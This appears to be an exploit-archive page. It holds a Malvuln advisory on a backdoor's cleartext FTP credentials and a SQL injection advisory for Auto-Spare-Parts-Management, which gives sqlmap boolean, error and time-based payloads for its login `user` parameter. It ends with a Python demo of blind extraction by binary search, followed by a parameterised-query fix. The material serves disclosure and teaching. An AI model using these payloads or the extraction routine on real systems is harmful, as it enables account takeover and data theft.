<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2021<br />Original source: https://malvuln.com/advisory/a1d045151c809535a308311931588fd0_B.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Backdoor.Win32.Fantador<br />Vulnerability: Insecure Password Storage<br />Description: The malware has an FTP component that can be enabled. The credentials are stored in cleartext in a file named "Fantasy.ini".<br />Type: PE32<br />MD5: a1d045151c809535a308311931588fd0<br />Vuln ID: MVID-2021-0439<br />Disclosure: 12/31/2021<br /><br />Exploit/PoC:<br />Fantasy.ini<br /><br />[FTP Server]<br />Address=0.0.0.0<br />User Name=admin<br />FileName=<br />PASSWORD=abc123<br />[Set]<br />ListenPort=21<br />TimeFlash=0<br /><br /></code></pre>
<pre><code>## Title: Auto-Spare-Parts-Management v1.0 remote SQL-Injections<br />## Author: nu11secur1ty<br />## Date: 02.19.2022<br />## Vendor: https://github.com/pavanpatil45<br />## Software: https://github.com/pavanpatil45/Auto-Spare-Parts-Management<br /><br /><br />## Description:<br />The login form of Auto-Spare-Parts-Management v1.0 is vulnerable to SQL<br />injection through the `user` POST parameter (the original scan note also<br />names the Referer HTTP header). Submitting the payload `'` returned a<br />database error message. An unauthenticated remote attacker can use this<br />to take control of every account in the system, wherever the application<br />is exposed (external domain, subdomain or internal network).<br />Status: CRITICAL<br /><br /><br />[+] Payloads (sqlmap output):<br /><br />```mysql<br />---<br />Parameter: user (POST)<br /> Type: boolean-based blind<br /> Title: AND boolean-based blind - WHERE or HAVING clause<br /> Payload: user=admin1' AND 5432=5432 AND 'MXPx'='MXPx&password=admin1&btnlogin=<br /><br /> Type: error-based<br /> Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)<br /> Payload: user=admin1' AND (SELECT 8861 FROM(SELECT COUNT(*),CONCAT(0x71786b6271,(SELECT (ELT(8861=8861,1))),0x71706b7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'aOSP'='aOSP&password=admin1&btnlogin=<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: user=admin1' AND (SELECT 1749 FROM (SELECT(SLEEP(3)))XjEM) AND 'xoHI'='xoHI&password=admin1&btnlogin=<br />---<br />```<br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/edit/main/vendors/pavanpatil45/Auto-Spare-Parts-Management)<br /><br />## Proof and Exploit:<br />[href](https://streamable.com/qq19po)<br /><br /><br /></code></pre>
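The three SQL injection advisories on this page (Perfect Survey's `question_id`, WP User Frontend's `status`, and the `user` login parameter above) share one root cause: a request parameter concatenated into a SQL string. The sqlmap payloads above show what the tool does with that; the following added example, which is not code from any of the three projects, shows why the boolean-based blind payload works and what a parameterised query changes. It models the pattern with an in-memory SQLite table and assumes the login handler fetches the row by user name and compares the password afterwards, which is what turns the difference between "no such user" and "wrong password" into a one-bit oracle. With that oracle, `blind_extract` recovers a column value one code point at a time by binary search, which is the account takeover the advisory warns about. The plaintext password in the table is a simplification for the demo.

```python
"""Boolean-based blind SQL injection against a concatenated login query, with the fix."""
import sqlite3


def build_db():
    """Constructed stand-in for the application's users table."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (user TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES ('admin1', 's3cret!')")   # plaintext only for the demo
    return db


def login_vulnerable(db, user, password):
    """The advisories' pattern: `user` lands inside the quotes unescaped."""
    sql = f"SELECT password FROM users WHERE user='{user}'"
    try:
        row = db.execute(sql).fetchone()
    except sqlite3.Error as exc:
        return f"database error: {exc}"        # the error message the advisory saw after a lone '
    if row is None:
        return "no such user"                  # boolean oracle: injected condition was false
    return "ok" if row[0] == password else "wrong password"   # condition was true


def login_safe(db, user, password):
    """Parameterised query plus one undifferentiated failure message."""
    row = db.execute("SELECT password FROM users WHERE user=?", (user,)).fetchone()
    if row is None or row[0] != password:
        return "invalid credentials"
    return "ok"


def oracle(db, condition):
    """True when the injected SQL condition holds for the admin1 row."""
    payload = f"admin1' AND ({condition}) AND 'x'='x"      # same shape as the sqlmap payload
    return login_vulnerable(db, payload, "irrelevant") != "no such user"


def _search(greater_than, lo, hi):
    """Binary search for an integer x in [lo, hi] using only the question 'x > n?'."""
    while lo < hi:
        mid = (lo + hi) // 2
        if greater_than(mid):
            lo = mid + 1
        else:
            hi = mid
    return lo


def blind_extract(ask, expr, max_len=64):
    """Recover the string value of SQL expression `expr` one code point at a time."""
    length = _search(lambda n: ask(f"length({expr}) > {n}"), 0, max_len)
    out = []
    for pos in range(1, length + 1):
        code = _search(lambda n: ask(f"unicode(substr({expr}, {pos}, 1)) > {n}"), 0, 0x10FFFF)
        out.append(chr(code))
    return "".join(out)


if __name__ == "__main__":
    db = build_db()
    print(login_vulnerable(db, "admin1' AND 5432=5432 AND 'MXPx'='MXPx", "admin1"))  # wrong password
    print(login_vulnerable(db, "admin1' AND 5432=5433 AND 'MXPx'='MXPx", "admin1"))  # no such user
    print(login_vulnerable(db, "'", "admin1"))                                          # database error
    print(blind_extract(lambda c: oracle(db, c), "password"))                          # s3cret!
    print(login_safe(db, "admin1' AND 5432=5432 AND 'MXPx'='MXPx", "admin1"))         # invalid credentials
```

Each recovered character costs about 21 requests with binary search instead of one per candidate character; against MySQL the same loop uses `ASCII(SUBSTRING(...))`, and the time-based payload above is the fallback when responses do not differ at all.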